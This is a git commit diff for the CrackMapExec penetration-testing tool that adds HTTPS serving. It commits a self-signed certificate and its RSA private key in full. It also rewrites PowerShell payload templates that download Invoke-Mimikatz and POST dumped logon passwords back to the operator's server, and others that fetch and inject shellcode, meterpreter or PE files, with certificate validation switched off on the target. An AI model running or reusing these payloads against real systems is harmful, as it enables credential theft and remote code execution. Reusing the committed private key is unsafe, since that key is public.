Added HTTPS support as per #15
parent
8054b5e655
commit
7d2ba3c63a
|
@ -0,0 +1,18 @@
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIC0zCCAbugAwIBAgIJAJoXi7tJgXIQMA0GCSqGSIb3DQEBCwUAMAAwHhcNMTUx
|
||||||
|
MDE2MTkwMTE0WhcNMjUxMDEzMTkwMTE0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
|
||||||
|
AQ8AMIIBCgKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
|
||||||
|
WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
|
||||||
|
/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
|
||||||
|
RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
|
||||||
|
TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
|
||||||
|
3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABo1AwTjAdBgNVHQ4EFgQU
|
||||||
|
Q7giuO8Hlv/pMqGMLASC8/uW82owHwYDVR0jBBgwFoAUQ7giuO8Hlv/pMqGMLASC
|
||||||
|
8/uW82owDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAGYf7iROqTpkG
|
||||||
|
Rl7O7Kf1gwb4LJcsSLSHKqOw76ujOVY4r552ayJLEGhkizXMgE4HuLTAdLFNd+KT
|
||||||
|
DyqxCK3GOikx0D/Wl+xgwQWxkNmuOlajDH1aNJp38BS9yFuHm5b8iOWLpgpoHfPU
|
||||||
|
9Lj16C3mnXRnKkmXxtg46gB3P1lT1Zv5Nl7o58//D/5/RCoRjZ4m/rfypekszsBZ
|
||||||
|
LzWwabf6WKWzwnx9S+tL/pelzMnhjJ83SmpRE0aKGjjw9+COzpnTyDdGSzCXLJM9
|
||||||
|
hjuDcReX7yk0o0thkwlu2pY2hA0ZwjAKu0fIZAD9s4QwxqfAnj26ENscd4VJA+Ph
|
||||||
|
4lJiTamdpA==
|
||||||
|
-----END CERTIFICATE-----
|
|
@ -0,0 +1,27 @@
|
||||||
|
-----BEGIN RSA PRIVATE KEY-----
|
||||||
|
MIIEowIBAAKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
|
||||||
|
WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
|
||||||
|
/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
|
||||||
|
RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
|
||||||
|
TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
|
||||||
|
3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABAoIBAFtHPVPpNZqr0Z/P
|
||||||
|
GHj7gLfgzGNVOUXumWwk5jDVpkFke0GowK7FYr0Fa2VPIwXuQCPxNsTgiUT5KVzd
|
||||||
|
Q0fywp+fNldf6D05fzqyhB9X13FNFRgh3dfnWWW9CF4zVNlNrjbscVOxtHbNLTr3
|
||||||
|
A6Dv/F8CyRNkLH6jaaeyy+E4T+yUdnZNUNumhXLRGMWUUOWbTlNtoMAoWcF7cPZh
|
||||||
|
srBPwaGsH6ePNTzLC4Nve1Zayz8OUtLMcMJk8A85LadImYiYrY3F/2Kvx9IgO9dn
|
||||||
|
LPJgFrejI5Wa5AWk9O4d32gduXFW8EkJfKwAXLRqIB1HT7lXESVQiVz6HBde5fNp
|
||||||
|
YxwzhEECgYEA4AQSIEnge88MUG3vWSFl5iMR93wK2EiLbQi5W6TbNJzVh62eiFnW
|
||||||
|
U9JzGi329FHhlH8A2T8jhShwyaOjG43Vfii+HSofYaxlf2TcEa6FqKvz8GOfgHbN
|
||||||
|
QdD+6JEYg5hVELsLI0ML4CMul5/86Wc4pComonFFoiKFSv0443aCJDkCgYEAycDS
|
||||||
|
NDi0ywSbJ/eeTPhiAAtHY4CjgHH15Ba9AFAHOkOHBPMH8l66WjgoVhAH85yBhybr
|
||||||
|
3e+I+RCBILHyI/N20XWZo9bPiX6C2w4ukEKt8gB8DwFZDkssgHtMtv3Q3P1CBH51
|
||||||
|
kwH6MURp0KZ3JYMNTjM9/crYNmk/9SzQSKiDKeMCgYAPjljP4zFyh4s8XpX7Y4VW
|
||||||
|
+OJ7hCKgqFD+TlfI1GbgfW+aj2Tt5QcsJPYXQE/g4Xq/vB4L+AV4brl+Vx2xgSTt
|
||||||
|
MNka31z0hGs78H4TwEHJ178F13UxD47rXh8FeWXxZXeqxMJePX6qnubSYqrGboOR
|
||||||
|
atfp+eGzA6Cr92+m5AjfiQKBgHAi1jLkWciFdN+QB9JsM7wmiLVLaJUZwjvWT5J+
|
||||||
|
6KV/puofUolqEVXX5MOBAYprsKq3/V1Lp+wXOk472YQV7DKblJu154BaaszqYwMX
|
||||||
|
rKrXjhyg+Siyq7d10Lvc81wA/9KTnzHoZXFAvzeTbqHQ53JRlOEc/3OuqDfTgqj/
|
||||||
|
0HdVAoGBAKOhnY43mUvJWkBI/HmWK3a4/nm4o90HHmcYZzdFMSPAyYqpRSfMS/9S
|
||||||
|
+XjbO0ZetdEo+PV7ko5fT8ncw20Jdv8VMA8FMSpQs13AuI3tjv+mABqmXsm0wGYc
|
||||||
|
7f/09XL6y42MDF81N2ujSYT4QGJW2t1ipkgOmCQQrjIJdEtOoySF
|
||||||
|
-----END RSA PRIVATE KEY-----
|
|
@ -0,0 +1,3 @@
|
||||||
|
#!/bin/bash
|
||||||
|
openssl genrsa -out crackmapexec.key 2048
|
||||||
|
openssl req -new -x509 -days 3650 -key crackmapexec.key -out crackmapexec.crt -subj "/"
|
|
@ -38,6 +38,7 @@ import csv
|
||||||
import re
|
import re
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
|
import ssl
|
||||||
import hashlib
|
import hashlib
|
||||||
import codecs
|
import codecs
|
||||||
import BaseHTTPServer
|
import BaseHTTPServer
|
||||||
|
@ -2686,22 +2687,9 @@ def enum_shares(smb):
|
||||||
|
|
||||||
return permissions
|
return permissions
|
||||||
|
|
||||||
def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurlsa::logonpasswords exit'):
|
def ps_command(command):
|
||||||
|
if args.ssl:
|
||||||
if katz_ip:
|
command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + command
|
||||||
command = """
|
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Mimikatz.ps1');
|
|
||||||
$creds = Invoke-Mimikatz -Command "{katz_command}";
|
|
||||||
$request = [System.Net.WebRequest]::Create('http://{addr}');
|
|
||||||
$request.Method = "POST";
|
|
||||||
$request.ContentType = "application/x-www-form-urlencoded";
|
|
||||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
|
||||||
$request.ContentLength = $bytes.Length;
|
|
||||||
$requestStream = $request.GetRequestStream();
|
|
||||||
$requestStream.Write( $bytes, 0, $bytes.Length );
|
|
||||||
$requestStream.Close();
|
|
||||||
$request.GetResponse();
|
|
||||||
""".format(addr=katz_ip, katz_command=katz_command)
|
|
||||||
|
|
||||||
if args.force_ps32:
|
if args.force_ps32:
|
||||||
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
|
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
|
||||||
|
@ -2712,12 +2700,37 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
|
||||||
|
|
||||||
return ps_command
|
return ps_command
|
||||||
|
|
||||||
|
def gen_mimikatz_command(localip, katz_command='privilege::debug sekurlsa::logonpasswords exit'):
|
||||||
|
protocol = 'http'
|
||||||
|
if args.ssl:
|
||||||
|
protocol = 'https'
|
||||||
|
|
||||||
|
command = """
|
||||||
|
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
|
||||||
|
$creds = Invoke-Mimikatz -Command "{katz_command}";
|
||||||
|
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}');
|
||||||
|
$request.Method = "POST";
|
||||||
|
$request.ContentType = "application/x-www-form-urlencoded";
|
||||||
|
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
||||||
|
$request.ContentLength = $bytes.Length;
|
||||||
|
$requestStream = $request.GetRequestStream();
|
||||||
|
$requestStream.Write( $bytes, 0, $bytes.Length );
|
||||||
|
$requestStream.Close();
|
||||||
|
$request.GetResponse();
|
||||||
|
""".format(protocol=protocol, addr=localip, katz_command=katz_command)
|
||||||
|
|
||||||
|
return ps_command(command)
|
||||||
|
|
||||||
def inject_pscommand(localip):
|
def inject_pscommand(localip):
|
||||||
|
protocol = 'http'
|
||||||
|
if args.ssl:
|
||||||
|
protocol = 'https'
|
||||||
|
|
||||||
if args.inject.startswith('met_'):
|
if args.inject.startswith('met_'):
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('{}://{}/Invoke-Shellcode.ps1');
|
||||||
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
|
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(protocol,
|
||||||
|
localip,
|
||||||
args.inject[4:],
|
args.inject[4:],
|
||||||
args.met_options[0],
|
args.met_options[0],
|
||||||
args.met_options[1])
|
args.met_options[1])
|
||||||
|
@ -2728,10 +2741,12 @@ def inject_pscommand(localip):
|
||||||
|
|
||||||
elif args.inject == 'shellcode':
|
elif args.inject == 'shellcode':
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
|
||||||
$WebClient = New-Object System.Net.WebClient;
|
$WebClient = New-Object System.Net.WebClient;
|
||||||
[Byte[]]$bytes = $WebClient.DownloadData('http://{addr}/{shellcode}');
|
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
|
||||||
Invoke-Shellcode -Force -Shellcode $bytes""".format(addr=localip, shellcode=args.path.split('/')[-1])
|
Invoke-Shellcode -Force -Shellcode $bytes""".format(protocol=protocol,
|
||||||
|
addr=localip,
|
||||||
|
shellcode=args.path.split('/')[-1])
|
||||||
|
|
||||||
if args.procid:
|
if args.procid:
|
||||||
command += " -ProcessID {}".format(args.procid)
|
command += " -ProcessID {}".format(args.procid)
|
||||||
|
@ -2740,8 +2755,10 @@ def inject_pscommand(localip):
|
||||||
|
|
||||||
elif args.inject == 'exe' or args.inject == 'dll':
|
elif args.inject == 'exe' or args.inject == 'dll':
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-ReflectivePEInjection.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
|
||||||
Invoke-ReflectivePEInjection -PEUrl http://{addr}/{pefile}""".format(addr=localip, pefile=args.path.split('/')[-1])
|
Invoke-ReflectivePEInjection -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=protocol,
|
||||||
|
addr=localip,
|
||||||
|
pefile=args.path.split('/')[-1])
|
||||||
|
|
||||||
if args.procid:
|
if args.procid:
|
||||||
command += " -ProcID {}"
|
command += " -ProcID {}"
|
||||||
|
@ -2924,14 +2941,14 @@ def connect(host):
|
||||||
|
|
||||||
if args.mimikatz:
|
if args.mimikatz:
|
||||||
noOutput = True
|
noOutput = True
|
||||||
args.command = ps_command(katz_ip=local_ip)
|
args.command = gen_mimikatz_command(local_ip)
|
||||||
|
|
||||||
if args.mimi_cmd:
|
if args.mimi_cmd:
|
||||||
noOutput = True
|
noOutput = True
|
||||||
args.command = ps_command(katz_ip=local_ip, katz_command=args.mimi_cmd)
|
args.command = gen_mimikatz_command(local_ip, args.mimi_cmd)
|
||||||
|
|
||||||
if args.pscommand:
|
if args.pscommand:
|
||||||
args.command = ps_command(command=args.pscommand)
|
args.command = ps_command(args.pscommand)
|
||||||
|
|
||||||
if args.inject:
|
if args.inject:
|
||||||
noOutput = True
|
noOutput = True
|
||||||
|
@ -3029,6 +3046,7 @@ if __name__ == '__main__':
|
||||||
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)')
|
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)')
|
||||||
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
|
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
|
||||||
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
|
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
|
||||||
|
parser.add_argument("--https", dest='ssl', action='store_true', help='Serve everything over https instead of http')
|
||||||
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
|
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
|
||||||
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
|
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
|
||||||
|
|
||||||
|
@ -3153,18 +3171,23 @@ if __name__ == '__main__':
|
||||||
print_error('Unable to find combo file at specified path')
|
print_error('Unable to find combo file at specified path')
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if args.mimikatz or args.mimi_cmd or args.inject or (args.ntds == 'ninja'):
|
if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
|
||||||
print_status("Press CTRL-C at any time to exit")
|
print_status("Press CTRL-C at any time to exit")
|
||||||
print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
|
print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
|
||||||
|
|
||||||
server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
|
if args.ssl:
|
||||||
t = Thread(name='HTTPServer', target=server.serve_forever)
|
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
|
||||||
|
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
|
||||||
|
else:
|
||||||
|
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
|
||||||
|
|
||||||
|
t = Thread(name='HTTPServer', target=httpd.serve_forever)
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
concurrency(hosts)
|
concurrency(hosts)
|
||||||
|
|
||||||
if args.mimikatz or args.inject or args.ntds == 'ninja':
|
if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
sleep(1)
|
sleep(1)
|
||||||
|
|
Loading…
Reference in New Issue